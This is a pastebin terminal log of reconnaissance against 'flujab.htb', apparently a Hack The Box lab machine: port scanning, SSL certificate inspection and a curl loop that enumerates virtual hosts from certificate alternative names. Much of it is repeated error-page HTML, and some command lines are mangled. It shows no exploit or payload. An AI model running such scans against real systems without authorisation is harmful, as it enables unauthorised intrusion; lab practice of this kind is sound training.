flujab.htb

a guest
Dec 31st, 2018
  1. root@kali:~/HTB/FluJab# nmap -p- --open flujab.htb
  2. Starting Nmap 7.70 ( https://nmap.org ) at 2018-12-31 17:14 GMT
  3. Nmap scan report for flujab.htb (10.10.10.144)
  4. Host is up (0.00013s latency).
  5. rDNS record for 10.10.10.144: flujab.lan
  6. Not shown: 65531 closed ports
  7. PORT     STATE SERVICE
  8. 22/tcp   open  ssh
  9. 80/tcp   open  http
  10. 443/tcp  open  https
  11. 8080/tcp open  http-proxy
  12. MAC Address: 08:00:27:88:86:20 (Oracle VirtualBox virtual NIC)
  13.  
  14. Nmap done: 1 IP address (1 host up) scanned in 3.03 seconds
  15. root@kali:~/HTB/FluJab# ssh -vv flujab.htb
  16. OpenSSH_7.9p1 Debian-4, OpenSSL 1.1.1a  20 Nov 2018
  17. debug1: Reading configuration data /root/.ssh/config
  18. debug1: Reading configuration data /etc/ssh/ssh_config
  19. debug1: /etc/ssh/ssh_config line 19: Applying options for *
  20. debug2: resolving "flujab.htb" port 22
  21. debug2: ssh_connect_direct
  22. debug1: Connecting to flujab.htb [10.10.10.144] port 22.
  23. debug1: Connection established.
  24. debug1: identity file /root/.ssh/id_rsa type 0
  25. debug1: identity file /root/.ssh/id_rsa-cert type -1
  26. debug1: identity file /root/.ssh/id_dsa type -1
  27. debug1: identity file /root/.ssh/id_dsa-cert type -1
  28. debug1: identity file /root/.ssh/id_ecdsa type -1
  29. debug1: identity file /root/.ssh/id_ecdsa-cert type -1
  30. debug1: identity file /root/.ssh/id_ed25519 type -1
  31. debug1: identity file /root/.ssh/id_ed25519-cert type -1
  32. debug1: identity file /root/.ssh/id_xmss type -1
  33. debug1: identity file /root/.ssh/id_xmss-cert type -1
  34. debug1: Local version string SSH-2.0-OpenSSH_7.9p1 Debian-4
  35. ssh_exchange_identification: read: Connection reset by peer
  36. root@kali:~/HTB/FluJab# curl -v http://flujab.htb
  37. * Rebuilt URL to: http://flujab.htb/
  38. * Uses proxy env variable no_proxy == 'localhost,127.0.0.0/8,::1'
  39. * Uses proxy env variable http_proxy == 'http://127.0.0.1:8080/'
  40. *   Trying 127.0.0.1...
  41. * TCP_NODELAY set
  42. * Connected to 127.0.0.1 (127.0.0.1) port 8080 (#0)
  43. > GET http://flujab.htb/ HTTP/1.1
  44. > Host: flujab.htb
  45. > User-Agent: curl/7.61.0
  46. > Accept: */*
  47. > Proxy-Connection: Keep-Alive
  48. >
  49. < HTTP/1.1 301 Moved Permanently
  50. < Date: Thu, 20 Dec 2018 00:33:52 GMT
  51. < Content-Type: text/html
  52. < Content-Length: 178
  53. < Connection: close
  54. < Location: https://flujab.htb/
  55. < Server: ClownWare Proxy
  56. <
  57. <html>
  58. <head><title>301 Moved Permanently</title></head>
  59. <body bgcolor="white">
  60. <center><h1>301 Moved Permanently</h1></center>
  61. <hr><center>nginx</center>
  62. </body>
  63. </html>
  64. * Closing connection 0
  65. root@kali:~/HTB/FluJab# curl -v -k https://flujab.htb
  66. * Rebuilt URL to: https://flujab.htb/
  67. * Uses proxy env variable no_proxy == 'localhost,127.0.0.0/8,::1'
  68. * Uses proxy env variable https_proxy == 'http://127.0.0.1:8080/'
  69. *   Trying 127.0.0.1...
  70. * TCP_NODELAY set
  71. * Connected to 127.0.0.1 (127.0.0.1) port 8080 (#0)
  72. * allocate connect buffer!
  73. * Establish HTTP proxy tunnel to flujab.htb:443
  74. > CONNECT flujab.htb:443 HTTP/1.1
  75. > Host: flujab.htb:443
  76. > User-Agent: curl/7.61.0
  77. > Proxy-Connection: Keep-Alive
  78. >
  79. < HTTP/1.0 200 Connection established
  80. <
  81. * Proxy replied 200 to CONNECT request
  82. * CONNECT phase completed!
  83. * ALPN, offering h2
  84. * ALPN, offering http/1.1
  85. * successfully set certificate verify locations:
  86. *   CAfile: none
  87.   CApath: /etc/ssl/certs
  88. * (304) (OUT), TLS handshake, Client hello (1):
  89. * CONNECT phase completed!
  90. * CONNECT phase completed!
  91. * (304) (IN), TLS handshake, Server hello (2):
  92. * TLSv1.2 (IN), TLS handshake, Certificate (11):
  93. * TLSv1.2 (IN), TLS handshake, Server key exchange (12):
  94. * TLSv1.2 (IN), TLS handshake, Server finished (14):
  95. * TLSv1.2 (OUT), TLS handshake, Client key exchange (16):
  96. * TLSv1.2 (OUT), TLS change cipher, Client hello (1):
  97. * TLSv1.2 (OUT), TLS handshake, Finished (20):
  98. * TLSv1.2 (IN), TLS handshake, Finished (20):
  99. * SSL connection using TLSv1.2 / ECDHE-RSA-AES256-GCM-SHA384
  100. * ALPN, server did not agree to a protocol
  101. * Server certificate:
  102. *  subject: C=PortSwigger; O=PortSwigger; OU=PortSwigger CA; CN=flujab.htb
  103. *  start date: Jan 21 17:26:12 2014 GMT
  104. *  expire date: Jan 21 17:26:12 2038 GMT
  105. *  issuer: C=PortSwigger; ST=PortSwigger; L=PortSwigger; O=PortSwigger; OU=PortSwigger CA; CN=PortSwigger CA
  106. *  SSL certificate verify result: self signed certificate in certificate chain (19), continuing anyway.
  107. > GET / HTTP/1.1
  108. > Host: flujab.htb
  109. > User-Agent: curl/7.61.0
  110. > Accept: */*
  111. >
  112. < HTTP/1.1 200 OK
  113. < Date: Thu, 20 Dec 2018 00:34:05 GMT
  114. < Content-Type: text/html; charset=UTF-8
  115. < Connection: close
  116. < Server: ClownWare Proxy
  117. < Content-Length: 3475
  118. <
  119. <!DOCTYPE html>
  120. <!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->
  121. <!--[if IE 7]>    <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->
  122. <!--[if IE 8]>    <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->
  123. <!--[if gt IE 8]><!-->
  124. <html class="js" style="opacity: 1; visibility: visible;" lang="en-US"><!--<![endif]--><head>
  125. <title>Direct IP access not allowed | ClownWare</title>
  126. <meta charset="UTF-8">
  127. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  128. <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1">
  129. <meta name="robots" content="noindex, nofollow">
  130. <meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1">
  131. <link rel="stylesheet" id="cf_styles-css" href="index_files/cf.css" type="text/css" media="screen,projection">
  132. <!--[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" type="text/css" media="screen,projection" /><![endif]-->
  133. <style type="text/css">body{margin:0;padding:0}</style>
  134.  
  135.  
  136. <!--[if gte IE 10]><!--><script type="text/javascript" src="index_files/zepto.js"></script><!--<![endif]-->
  137. <!--[if gte IE 10]><!--><script type="text/javascript" src="index_files/cf.js"></script><!--<![endif]-->
  138.  
  139.  
  140.  
  141. </head>
  142. <body>
  143.   <div id="cf-wrapper">
  144.     <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div>
  145.     <div id="cf-error-details" class="cf-error-details-wrapper">
  146.       <div class="cf-wrapper cf-header cf-error-overview">
  147.         <h1>
  148.           <span class="cf-error-type" data-translate="error">Error</span>
  149.           <span class="cf-error-code">1003</span>
  150.           <small class="heading-ray-id">Ray ID: 8200faea05db2a70
  151.  • 2018-12-20 00:34:05 GMT
  152. </small>
  153.         </h1>
  154.         <h2 class="cf-subheadline">Direct IP access not allowed</h2>
  155.       </div><!-- /.header -->
  156.  
  157.       <section></section><!-- spacer -->
  158.  
  159.       <div class="cf-section cf-wrapper">
  160.         <div class="cf-columns two">
  161.           <div class="cf-column">
  162.             <h2 data-translate="what_happened">What happened?</h2>
  163.             <p>You've requested an IP address that is part of the <a href="https://clownware.htb/link.php" target="https://clownware.htb/link.php">ClownWare</a> network. A valid Host header must be supplied to reach the desired website.</p>
  164.          </div>
  165.  
  166.          
  167.          <div class="cf-column">
  168.            <h2 data-translate="what_can_i_do">What can I do?</h2>
  169.            <p>If you are interested in learning more about ClownWare, please <a href="https://clownware.htb/link.php" target="https://clownware.htb/link.php">visit our website</a>.</p>
  170.          </div>
  171.          
  172.        </div>
  173.      </div><!-- /.section -->
  174.  
  175.      <div class="cf-error-footer cf-wrapper">
  176.  <p>
  177.    <span class="cf-footer-item">ClownWare Ray ID: <strong>a6bfdb8e3f25f144
  178. </strong></span>
  179.    <span class="cf-footer-separator">•</span>
  180.    <span class="cf-footer-item"><span>Your IP</span>: 20.20.20.81</span>
  181.    <span class="cf-footer-separator">•</span>
  182.    <span class="cf-footer-item"><span>Performance &amp; security by</span> <a href="https://clownware.htb/link.php" id="brand_link" target="https://clownware.htb/link.php">ClownWare</a></span>
  183.    
  184.  </p>
  185. </div><!-- /.error-footer -->
  186.  
  187.  
  188.    </div><!-- /#cf-error-details -->
  189.  </div><!-- /#cf-wrapper -->
  190.  
  191.  <script type="text/javascript">
  192.  window._cf_translation = {};
  193.  
  194.  
  195. </script>
  196.  
  197.  
  198.  
  199. * Closing connection 0
  200. * TLSv1.2 (OUT), TLS alert, Client hello (1):
  201. </body></html>root@kali:~/HTB/FluJab# sslscan https://flujab.htb
  202. Version: 1.11.12-static
  203. OpenSSL 1.0.2-chacha (1.0.2g-dev)
  204.  
  205. Connected to 10.10.10.144
  206.  
  207. Testing SSL server flujab.htb on port 443 using SNI name flujab.htb
  208.  
  209.  TLS Fallback SCSV:
  210. Server supports TLS Fallback SCSV
  211.  
  212.  TLS renegotiation:
  213. Secure session renegotiation supported
  214.  
  215.  TLS Compression:
  216. Compression disabled
  217.  
  218.  Heartbleed:
  219. TLS 1.2 not vulnerable to heartbleed
  220. TLS 1.1 not vulnerable to heartbleed
  221. TLS 1.0 not vulnerable to heartbleed
  222.  
  223.  Supported Server Cipher(s):
  224. Preferred TLSv1.2  256 bits  ECDHE-RSA-AES256-GCM-SHA384   Curve P-256 DHE 256
  225. Accepted  TLSv1.2  256 bits  DHE-RSA-AES256-GCM-SHA384     DHE 1024 bits
  226. Accepted  TLSv1.2  128 bits  ECDHE-RSA-AES128-GCM-SHA256   Curve P-256 DHE 256
  227. Accepted  TLSv1.2  128 bits  DHE-RSA-AES128-GCM-SHA256     DHE 1024 bits
  228. Accepted  TLSv1.2  256 bits  ECDHE-RSA-AES256-SHA384       Curve P-256 DHE 256
  229. Accepted  TLSv1.2  256 bits  DHE-RSA-AES256-SHA256         DHE 1024 bits
  230. Accepted  TLSv1.2  256 bits  ECDHE-RSA-CAMELLIA256-SHA384  Curve P-256 DHE 256
  231. Accepted  TLSv1.2  256 bits  DHE-RSA-CAMELLIA256-SHA256    DHE 1024 bits
  232. Accepted  TLSv1.2  128 bits  ECDHE-RSA-AES128-SHA256       Curve P-256 DHE 256
  233. Accepted  TLSv1.2  128 bits  DHE-RSA-AES128-SHA256         DHE 1024 bits
  234. Accepted  TLSv1.2  128 bits  ECDHE-RSA-CAMELLIA128-SHA256  Curve P-256 DHE 256
  235. Accepted  TLSv1.2  128 bits  DHE-RSA-CAMELLIA128-SHA256    DHE 1024 bits
  236. Accepted  TLSv1.2  256 bits  ECDHE-RSA-AES256-SHA          Curve P-256 DHE 256
  237. Accepted  TLSv1.2  256 bits  DHE-RSA-AES256-SHA            DHE 1024 bits
  238. Accepted  TLSv1.2  256 bits  DHE-RSA-CAMELLIA256-SHA       DHE 1024 bits
  239. Accepted  TLSv1.2  128 bits  ECDHE-RSA-AES128-SHA          Curve P-256 DHE 256
  240. Accepted  TLSv1.2  128 bits  DHE-RSA-AES128-SHA            DHE 1024 bits
  241. Accepted  TLSv1.2  128 bits  DHE-RSA-CAMELLIA128-SHA       DHE 1024 bits
  242. Accepted  TLSv1.2  256 bits  AES256-GCM-SHA384            
  243. Accepted  TLSv1.2  128 bits  AES128-GCM-SHA256            
  244. Accepted  TLSv1.2  256 bits  AES256-SHA256                
  245. Accepted  TLSv1.2  256 bits  CAMELLIA256-SHA256          
  246. Accepted  TLSv1.2  128 bits  AES128-SHA256                
  247. Accepted  TLSv1.2  128 bits  CAMELLIA128-SHA256          
  248. Accepted  TLSv1.2  256 bits  AES256-SHA                  
  249. Accepted  TLSv1.2  256 bits  CAMELLIA256-SHA              
  250. Accepted  TLSv1.2  128 bits  AES128-SHA                  
  251. Accepted  TLSv1.2  128 bits  CAMELLIA128-SHA              
  252. Preferred TLSv1.1  256 bits  ECDHE-RSA-AES256-SHA          Curve P-256 DHE 256
  253. Accepted  TLSv1.1  256 bits  DHE-RSA-AES256-SHA            DHE 1024 bits
  254. Accepted  TLSv1.1  256 bits  DHE-RSA-CAMELLIA256-SHA       DHE 1024 bits
  255. Accepted  TLSv1.1  128 bits  ECDHE-RSA-AES128-SHA          Curve P-256 DHE 256
  256. Accepted  TLSv1.1  128 bits  DHE-RSA-AES128-SHA            DHE 1024 bits
  257. Accepted  TLSv1.1  128 bits  DHE-RSA-CAMELLIA128-SHA       DHE 1024 bits
  258. Accepted  TLSv1.1  256 bits  AES256-SHA                  
  259. Accepted  TLSv1.1  256 bits  CAMELLIA256-SHA              
  260. Accepted  TLSv1.1  128 bits  AES128-SHA                  
  261. Accepted  TLSv1.1  128 bits  CAMELLIA128-SHA              
  262. Preferred TLSv1.0  256 bits  ECDHE-RSA-AES256-SHA          Curve P-256 DHE 256
  263. Accepted  TLSv1.0  256 bits  DHE-RSA-AES256-SHA            DHE 1024 bits
  264. Accepted  TLSv1.0  256 bits  DHE-RSA-CAMELLIA256-SHA       DHE 1024 bits
  265. Accepted  TLSv1.0  128 bits  ECDHE-RSA-AES128-SHA          Curve P-256 DHE 256
  266. Accepted  TLSv1.0  128 bits  DHE-RSA-AES128-SHA            DHE 1024 bits
  267. Accepted  TLSv1.0  128 bits  DHE-RSA-CAMELLIA128-SHA       DHE 1024 bits
  268. Accepted  TLSv1.0  256 bits  AES256-SHA                  
  269. Accepted  TLSv1.0  256 bits  CAMELLIA256-SHA              
  270. Accepted  TLSv1.0  128 bits  AES128-SHA                  
  271. Accepted  TLSv1.0  128 bits  CAMELLIA128-SHA              
  272.  
  273.  SSL Certificate:
  274. Signature Algorithm: sha256WithRSAEncryption
  275. RSA Key Strength:    4096
  276.  
  277. Subject:  ClownWare.htb
  278. Altnames: DNS:clownware.htb, DNS:sni147831.clownware.htb, DNS:*.clownware.htb, DNS:proxy.clownware.htb, DNS:console.flujab.htb, DNS:sys.flujab.htb, DNS:smtp.flujab.htb, DNS:vaccine4flu.htb, DNS:bestmedsupply.htb, DNS:custoomercare.megabank.htb, DNS:flowerzrus.htb, DNS:chocolateriver.htb, DNS:meetspinz.htb, DNS:rubberlove.htb, DNS:freeflujab.htb, DNS:flujab.htb
  279. Issuer:   ClownWare Certificate Authority
  280.  
  281. Not valid before: Nov 28 14:57:03 2018 GMT
  282. Not valid after:  Nov 27 14:57:03 2023 GMT
  283. root@kali:~/HTB/FluJab# mkdir FluJab
  284. root@kali:~/HTB/FluJab# cd FluJab/
  285. root@kali:~/HTB/FluJab# nano alt_names.txt
  286. root@kali:~/HTB/FluJab# sed -i s'/, DNS:/\n/'g alt_names.txt
  287. root@kali:~/HTB/FluJab# cat alt_names.txt
  288. clownware.htb
  289. sni147831.clownware.htb
  290. *.clownware.htb
  291. proxy.clownware.htb
  292. console.flujab.htb
  293. sys.flujab.htb
  294. smtp.flujab.htb
  295. vaccine4flu.htb
  296. bestmedsupply.htb
  297. custoomercare.megabank.htb
  298. flowerzrus.htb
  299. chocolateriver.htb
  300. meetspinz.htb
  301. rubberlove.htb
  302. freeflujab.htb
  303. flujab.htb
  304. root@kali:~/HTB/FluJab# for D in $(cat alt_names.txt); do printf $"\n\n$D\n---------------------"curl -v -k https://10.10.10.144/ -H "Host: $D";done
  305.  
  306.  
  307. clownware.htb
  308. ---------------------curl
  309.  
  310. sni147831.clownware.htb
  311. ---------------------curl
  312.  
  313. *.clownware.htb
  314. ---------------------curl
  315.  
  316. proxy.clownware.htb
  317. ---------------------curl
  318.  
  319. console.flujab.htb
  320. ---------------------curl
  321.  
  322. sys.flujab.htb
  323. ---------------------curl
  324.  
  325. smtp.flujab.htb
  326. ---------------------curl
  327.  
  328. vaccine4flu.htb
  329. ---------------------curl
  330.  
  331. bestmedsupply.htb
  332. ---------------------curl
  333.  
  334. custoomercare.megabank.htb
  335. ---------------------curl
  336.  
  337. flowerzrus.htb
  338. ---------------------curl
  339.  
  340. chocolateriver.htb
  341. ---------------------curl
  342.  
  343. meetspinz.htb
  344. ---------------------curl
  345.  
  346. rubberlove.htb
  347. ---------------------curl
  348.  
  349. freeflujab.htb
  350. ---------------------curl
  351.  
  352. flujab.htb
  353. root@kali:~/HTB/FluJab# lroot@kali:~/HTB/FluJab# for D in $(cat alt_names.txt); do printf $"\n\n$D\n---------------------" && curl 20.144/ -H "Host: $D";done0.144/ -H
  354. root@kali:~/HTB/FluJab# for D in $(cat alt_names.txt); do printf $"\n\n$D\n---------------------"curl -v -k https://20.20. && curl 20.144/ -H "Host: $D";done
  355.  
  457. root@kali:~/HTB/FluJab# for D in $(cat alt_names.txt); do printf $"\n\n$D\n---------------------" && curl -v -k https://10.10.10.144/ -H "Host: $D";done
  458.  
  459.  
  460. clownware.htb
  461. ---------------------* Uses proxy env variable no_proxy == 'localhost,127.0.0.0/8,::1'
  462. * Uses proxy env variable https_proxy == 'http://127.0.0.1:8080/'
  463. *   Trying 127.0.0.1...
  464. * TCP_NODELAY set
  465. * Connected to 127.0.0.1 (127.0.0.1) port 8080 (#0)
  466. * allocate connect buffer!
  467. * Establish HTTP proxy tunnel to 10.10.10.144:443
  468. > CONNECT 10.10.10.144:443 HTTP/1.1
  469. > Host: 10.10.10.144:443
  470. > User-Agent: curl/7.61.0
  471. > Proxy-Connection: Keep-Alive
  472. >
  473. < HTTP/1.0 200 Connection established
  474. <
  475. * Proxy replied 200 to CONNECT request
  476. * CONNECT phase completed!
  477. * ALPN, offering h2
  478. * ALPN, offering http/1.1
  479. * successfully set certificate verify locations:
  480. *   CAfile: none
  481.  CApath: /etc/ssl/certs
  482. * (304) (OUT), TLS handshake, Client hello (1):
  483. * CONNECT phase completed!
  484. * CONNECT phase completed!
  485. * (304) (IN), TLS handshake, Server hello (2):
  486. * TLSv1.2 (IN), TLS handshake, Certificate (11):
  487. * TLSv1.2 (IN), TLS handshake, Server key exchange (12):
  488. * TLSv1.2 (IN), TLS handshake, Server finished (14):
  489. * TLSv1.2 (OUT), TLS handshake, Client key exchange (16):
  490. * TLSv1.2 (OUT), TLS change cipher, Client hello (1):
  491. * TLSv1.2 (OUT), TLS handshake, Finished (20):
  492. * TLSv1.2 (IN), TLS handshake, Finished (20):
  493. * SSL connection using TLSv1.2 / ECDHE-RSA-AES256-GCM-SHA384
  494. * ALPN, server did not agree to a protocol
  495. * Server certificate:
  496. *  subject: C=PortSwigger; O=PortSwigger; OU=PortSwigger CA; CN=ClownWare.htb
  497. *  start date: Jan 21 17:26:12 2014 GMT
  498. *  expire date: Jan 21 17:26:12 2038 GMT
  499. *  issuer: C=PortSwigger; ST=PortSwigger; L=PortSwigger; O=PortSwigger; OU=PortSwigger CA; CN=PortSwigger CA
  500. *  SSL certificate verify result: self signed certificate in certificate chain (19), continuing anyway.
  501. > GET / HTTP/1.1
  502. > Host: clownware.htb
  503. > User-Agent: curl/7.61.0
  504. > Accept: */*
  505. >
  506. < HTTP/1.1 200 OK
  507. < Date: Thu, 20 Dec 2018 00:41:09 GMT
  508. < Content-Type: text/html; charset=UTF-8
  509. < Connection: close
  510. < Server: ClownWare Proxy
  511. < Content-Length: 3475
  512. <
  513. <!DOCTYPE html>
  514. <!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->
  515. <!--[if IE 7]>    <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->
  516. <!--[if IE 8]>    <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->
  517. <!--[if gt IE 8]><!-->
  518. <html class="js" style="opacity: 1; visibility: visible;" lang="en-US"><!--<![endif]--><head>
  519. <title>Direct IP access not allowed | ClownWare</title>
  520. <meta charset="UTF-8">
  521. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  522. <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1">
  523. <meta name="robots" content="noindex, nofollow">
  524. <meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1">
  525. <link rel="stylesheet" id="cf_styles-css" href="index_files/cf.css" type="text/css" media="screen,projection">
  526. <!--[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" type="text/css" media="screen,projection" /><![endif]-->
  527. <style type="text/css">body{margin:0;padding:0}</style>
  528.  
  529.  
  530. <!--[if gte IE 10]><!--><script type="text/javascript" src="index_files/zepto.js"></script><!--<![endif]-->
  531. <!--[if gte IE 10]><!--><script type="text/javascript" src="index_files/cf.js"></script><!--<![endif]-->
  532.  
  533.  
  534.  
  535. </head>
  536. <body>
  537.  <div id="cf-wrapper">
  538.    <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div>
  539.    <div id="cf-error-details" class="cf-error-details-wrapper">
  540.      <div class="cf-wrapper cf-header cf-error-overview">
  541.        <h1>
  542.          <span class="cf-error-type" data-translate="error">Error</span>
  543.          <span class="cf-error-code">1003</span>
  544.          <small class="heading-ray-id">Ray ID: 58174bcaeee9d85d
  545. • 2018-12-20 00:41:09 GMT
  546. </small>
  547.        </h1>
  548.        <h2 class="cf-subheadline">Direct IP access not allowed</h2>
  549.      </div><!-- /.header -->
  550.  
  551.      <section></section><!-- spacer -->
  552.  
  553.      <div class="cf-section cf-wrapper">
  554.        <div class="cf-columns two">
  555.          <div class="cf-column">
  556.            <h2 data-translate="what_happened">What happened?</h2>
  557.            <p>You've requested an IP address that is part of the <a href="https://clownware.htb/link.php" target="https://clownware.htb/link.php">ClownWare</a> network. A valid Host header must be supplied to reach the desired website.</p>
  558.           </div>
  559.  
  560.          
  561.           <div class="cf-column">
  562.             <h2 data-translate="what_can_i_do">What can I do?</h2>
  563.             <p>If you are interested in learning more about ClownWare, please <a href="https://clownware.htb/link.php" target="https://clownware.htb/link.php">visit our website</a>.</p>
  564.           </div>
  565.          
  566.         </div>
  567.       </div><!-- /.section -->
  568.  
  569.       <div class="cf-error-footer cf-wrapper">
  570.   <p>
  571.     <span class="cf-footer-item">ClownWare Ray ID: <strong>fafc46a6aae9d686
  572. </strong></span>
  573.     <span class="cf-footer-separator"></span>
  574.     <span class="cf-footer-item"><span>Your IP</span>: 20.20.20.81</span>
  575.     <span class="cf-footer-separator"></span>
  576.     <span class="cf-footer-item"><span>Performance &amp; security by</span> <a href="https://clownware.htb/link.php" id="brand_link" target="https://clownware.htb/link.php">ClownWare</a></span>
  577.    
  578.   </p>
  579. </div><!-- /.error-footer -->
  580.  
  581.  
  582.     </div><!-- /#cf-error-details -->
  583.   </div><!-- /#cf-wrapper -->
  584.  
  585.   <script type="text/javascript">
  586.   window._cf_translation = {};
  587.  
  588.  
  589. </script>
  590.  
  591.  
  592.  
  593. * Closing connection 0
  594. * TLSv1.2 (OUT), TLS alert, Client hello (1):
  595. </body></html>
  596.  
  597. sni147831.clownware.htb
  598. ---------------------* Uses proxy env variable no_proxy == 'localhost,127.0.0.0/8,::1'
  599. * Uses proxy env variable https_proxy == 'http://127.0.0.1:8080/'
  600. *   Trying 127.0.0.1...
  601. * TCP_NODELAY set
  602. * Connected to 127.0.0.1 (127.0.0.1) port 8080 (#0)
  603. * allocate connect buffer!
  604. * Establish HTTP proxy tunnel to 10.10.10.144:443
  605. > CONNECT 10.10.10.144:443 HTTP/1.1
  606. > Host: 10.10.10.144:443
  607. > User-Agent: curl/7.61.0
  608. > Proxy-Connection: Keep-Alive
  609. >
  610. < HTTP/1.0 200 Connection established
  611. <
  612. * Proxy replied 200 to CONNECT request
  613. * CONNECT phase completed!
  614. * ALPN, offering h2
  615. * ALPN, offering http/1.1
  616. * successfully set certificate verify locations:
  617. *   CAfile: none
  618.   CApath: /etc/ssl/certs
  619. * (304) (OUT), TLS handshake, Client hello (1):
  620. * CONNECT phase completed!
  621. * CONNECT phase completed!
  622. * (304) (IN), TLS handshake, Server hello (2):
  623. * TLSv1.2 (IN), TLS handshake, Certificate (11):
  624. * TLSv1.2 (IN), TLS handshake, Server key exchange (12):
  625. * TLSv1.2 (IN), TLS handshake, Server finished (14):
  626. * TLSv1.2 (OUT), TLS handshake, Client key exchange (16):
  627. * TLSv1.2 (OUT), TLS change cipher, Client hello (1):
  628. * TLSv1.2 (OUT), TLS handshake, Finished (20):
  629. * TLSv1.2 (IN), TLS handshake, Finished (20):
  630. * SSL connection using TLSv1.2 / ECDHE-RSA-AES256-GCM-SHA384
  631. * ALPN, server did not agree to a protocol
  632. * Server certificate:
  633. *  subject: C=PortSwigger; O=PortSwigger; OU=PortSwigger CA; CN=ClownWare.htb
  634. *  start date: Jan 21 17:26:12 2014 GMT
  635. *  expire date: Jan 21 17:26:12 2038 GMT
  636. *  issuer: C=PortSwigger; ST=PortSwigger; L=PortSwigger; O=PortSwigger; OU=PortSwigger CA; CN=PortSwigger CA
  637. *  SSL certificate verify result: self signed certificate in certificate chain (19), continuing anyway.
  638. > GET / HTTP/1.1
  639. > Host: sni147831.clownware.htb
  640. > User-Agent: curl/7.61.0
  641. > Accept: */*
  642. >
  643. < HTTP/1.1 200 OK
  644. < Date: Thu, 20 Dec 2018 00:41:09 GMT
  645. < Content-Type: text/html; charset=UTF-8
  646. < Connection: close
  647. < Server: ClownWare Proxy
  648. < Content-Length: 3475
  649. <
  650. <!DOCTYPE html>
  651. <!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->
  652. <!--[if IE 7]>    <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->
  653. <!--[if IE 8]>    <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->
  654. <!--[if gt IE 8]><!-->
  655. <html class="js" style="opacity: 1; visibility: visible;" lang="en-US"><!--<![endif]--><head>
  656. <title>Direct IP access not allowed | ClownWare</title>
  657. <meta charset="UTF-8">
  658. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  659. <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1">
  660. <meta name="robots" content="noindex, nofollow">
  661. <meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1">
  662. <link rel="stylesheet" id="cf_styles-css" href="index_files/cf.css" type="text/css" media="screen,projection">
  663. <!--[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href="/cdn-cgi/styles/cf.errors.ie.css" type="text/css" media="screen,projection" /><![endif]-->
  664. <style type="text/css">body{margin:0;padding:0}</style>
  665.  
  666.  
  667. <!--[if gte IE 10]><!--><script type="text/javascript" src="index_files/zepto.js"></script><!--<![endif]-->
  668. <!--[if gte IE 10]><!--><script type="text/javascript" src="index_files/cf.js"></script><!--<![endif]-->
  669.  
  670.  
  671.  
  672. </head>
  673. <body>
  674.   <div id="cf-wrapper">
  675.     <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div>
  676.     <div id="cf-error-details" class="cf-error-details-wrapper">
  677.       <div class="cf-wrapper cf-header cf-error-overview">
  678.         <h1>
  679.           <span class="cf-error-type" data-translate="error">Error</span>
  680.           <span class="cf-error-code">1003</span>
  681.           <small class="heading-ray-id">Ray ID: 0229d06e91a4ba7d
  682.  • 2018-12-20 00:41:09 GMT
  683. </small>
  684.         </h1>
  685.         <h2 class="cf-subheadline">Direct IP access not allowed</h2>
  686.       </div><!-- /.header -->
  687.  
  688.       <section></section><!-- spacer -->
  689.  
  690.       <div class="cf-section cf-wrapper">
  691.         <div class="cf-columns two">
  692.           <div class="cf-column">
  693.             <h2 data-translate="what_happened">What happened?</h2>
  694.             <p>You've requested an IP address that is part of the <a href="https://clownware.htb/link.php" target="https://clownware.htb/link.php">ClownWare</a> network. A valid Host header must be supplied to reach the desired website.</p>
  695.          </div>
  696.  
  697.          
  698.          <div class="cf-column">
  699.            <h2 data-translate="what_can_i_do">What can I do?</h2>
  700.            <p>If you are interested in learning more about ClownWare, please <a href="https://clownware.htb/link.php" target="https://clownware.htb/link.php">visit our website</a>.</p>
  701.          </div>
  702.          
  703.        </div>
  704.      </div><!-- /.section -->
  705.  
  706.      <div class="cf-error-footer cf-wrapper">
  707.  <p>
  708.    <span class="cf-footer-item">ClownWare Ray ID: <strong>b0dafa1dd9b81b68
  709. </strong></span>
  710.    <span class="cf-footer-separator">•</span>
  711.    <span class="cf-footer-item"><span>Your IP</span>: 20.20.20.81</span>
  712.    <span class="cf-footer-separator">•</span>
  713.    <span class="cf-footer-item"><span>Performance &amp; security by</span> <a href="https://clownware.htb/link.php" id="brand_link" target="https://clownware.htb/link.php">ClownWare</a></span>
  714.    
  715.  </p>
  716. </div><!-- /.error-footer -->
  717.  
  718.  
  719.    </div><!-- /#cf-error-details -->
  720.  </div><!-- /#cf-wrapper -->
  721.  
  722.  <script type="text/javascript">
  723.  window._cf_translation = {};
  724.  
  725.  
  726. </script>
  727.  
  728.  
  729.  
  730. * Closing connection 0
  731. * TLSv1.2 (OUT), TLS alert, Client hello (1):
  732. </body></html>
  733.  
  734. *.clownware.htb
  735. ---------------------* Uses proxy env variable no_proxy == 'localhost,127.0.0.0/8,::1'
  736. * Uses proxy env variable https_proxy == 'http://127.0.0.1:8080/'
  737. *   Trying 127.0.0.1...
  738. * TCP_NODELAY set
  739. * Connected to 127.0.0.1 (127.0.0.1) port 8080 (#0)
  740. * allocate connect buffer!
  741. * Establish HTTP proxy tunnel to 10.10.10.144:443
  742. > CONNECT 10.10.10.144:443 HTTP/1.1
  743. > Host: 10.10.10.144:443
